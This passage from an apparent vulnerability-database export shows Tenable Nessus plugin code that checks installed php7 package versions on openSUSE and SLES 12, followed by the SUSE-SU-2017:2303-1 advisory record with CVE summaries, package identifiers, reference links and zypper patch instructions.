rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvsem-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvsem-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvshm-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvshm-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tidy-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tidy-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tokenizer-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tokenizer-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-wddx-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-wddx-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlreader-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlreader-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlrpc-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlrpc-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlwriter-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlwriter-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xsl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xsl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zip-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zip-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zlib-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zlib-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php7-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php7-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bcmath-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bcmath-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bz2-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bz2-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-calendar-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-calendar-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ctype-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ctype-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-curl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-curl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dba-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dba-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-debugsource-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-devel-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dom-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dom-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-enchant-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-enchant-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-exif-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-exif-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fastcgi-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fastcgi-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fileinfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fileinfo-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-firebird-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-firebird-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fpm-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fpm-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ftp-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ftp-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gd-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gd-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gettext-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gettext-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gmp-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gmp-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-iconv-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-iconv-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-imap-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-imap-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-intl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-intl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-json-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-json-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ldap-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ldap-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mbstring-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mbstring-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mcrypt-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mcrypt-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mysql-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mysql-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-odbc-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-odbc-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-opcache-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-opcache-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-openssl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-openssl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pcntl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pcntl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pdo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pdo-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pear-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pear-Archive_Tar-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pgsql-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pgsql-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-phar-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-phar-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-posix-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-posix-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pspell-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pspell-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-readline-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-readline-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-shmop-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-shmop-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-snmp-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-snmp-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-soap-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-soap-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sockets-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sockets-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sqlite-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sqlite-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvmsg-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvmsg-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvsem-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvsem-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvshm-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvshm-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tidy-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tidy-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tokenizer-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tokenizer-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-wddx-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-wddx-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlreader-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlreader-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlrpc-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlrpc-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlwriter-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlwriter-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xsl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xsl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zip-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zip-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zlib-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zlib-debuginfo-7.0.7-19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php7 / apache2-mod_php7-debuginfo / php7 / php7-bcmath / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:26:16", "description": "This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU\n consumption denial of service attack by injectinglong\n form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() could lead to denial of service\n (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of\n service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting in heap overflow could lead to denial of\n service or code execution (bsc#986386) Other fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require\n php7-pear-Archive_Tar otherwise this dependency must be\n declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLES12 Security Update : php7 (SUSE-SU-2017:2303-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:php7-bcmath", "p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php7-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sockets", "p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:php7-shmop", "p-cpe:/a:novell:suse_linux:php7-soap", "p-cpe:/a:novell:suse_linux:php7-fastcgi", "p-cpe:/a:novell:suse_linux:php7-gmp", "p-cpe:/a:novell:suse_linux:php7-gettext", "p-cpe:/a:novell:suse_linux:php7-sysvmsg", "p-cpe:/a:novell:suse_linux:php7-mysql", "p-cpe:/a:novell:suse_linux:php7-pgsql", "p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php7", "p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mcrypt", "p-cpe:/a:novell:suse_linux:php7-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php7-calendar", "p-cpe:/a:novell:suse_linux:php7-odbc", "p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fpm", "p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlrpc", "p-cpe:/a:novell:suse_linux:php7-posix", "p-cpe:/a:novell:suse_linux:php7-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php7-imap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-iconv", "p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-intl", "p-cpe:/a:novell:suse_linux:php7-enchant", "p-cpe:/a:novell:suse_linux:php7-opcache", "p-cpe:/a:novell:suse_linux:php7-sysvsem", "p-cpe:/a:novell:suse_linux:php7-phar", "p-cpe:/a:novell:suse_linux:php7-mbstring", "p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php7-json", "p-cpe:/a:novell:suse_linux:php7-openssl", "p-cpe:/a:novell:suse_linux:php7-xmlwriter", "p-cpe:/a:novell:suse_linux:php7-dba", "p-cpe:/a:novell:suse_linux:php7-phar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-json-debuginfo", "p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pdo", "p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-tokenizer", "p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php7-snmp", "p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gd", "p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php7-curl", "p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo", "p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xsl", "p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvshm", "p-cpe:/a:novell:suse_linux:php7-pcntl", "p-cpe:/a:novell:suse_linux:php7-wddx", "p-cpe:/a:novell:suse_linux:php7-ldap", "p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-mod_php7", "p-cpe:/a:novell:suse_linux:php7-xmlreader", "p-cpe:/a:novell:suse_linux:php7-ftp", "p-cpe:/a:novell:suse_linux:php7-imap", "p-cpe:/a:novell:suse_linux:php7-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php7-exif", "p-cpe:/a:novell:suse_linux:php7-ctype", "p-cpe:/a:novell:suse_linux:php7-zlib", "p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-zip", "p-cpe:/a:novell:suse_linux:php7-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sqlite", "p-cpe:/a:novell:suse_linux:php7-dom", "p-cpe:/a:novell:suse_linux:php7-pspell", "p-cpe:/a:novell:suse_linux:php7-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php7-bz2", "p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo"], "id": "SUSE_SU-2017-2303-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120003", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2303-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120003);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11142\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-7890\");\n\n script_name(english:\"SUSE SLES12 Security Update : php7 (SUSE-SU-2017:2303-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU\n consumption denial of service attack by injectinglong\n form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() could lead to denial of service\n (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of\n service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting in heap overflow could lead to denial of\n service or code execution (bsc#986386) Other fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require\n php7-pear-Archive_Tar otherwise this dependency must be\n declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10397/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5766/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11142/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11144/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11145/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11147/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11628/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7890/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172303-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9326f566\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1417=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1417=1\n\nSUSE Linux Enterprise Module for Web Scripting 12:zypper in -t patch\nSUSE-SLE-Module-Web-Scripting-12-2017-1417=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n 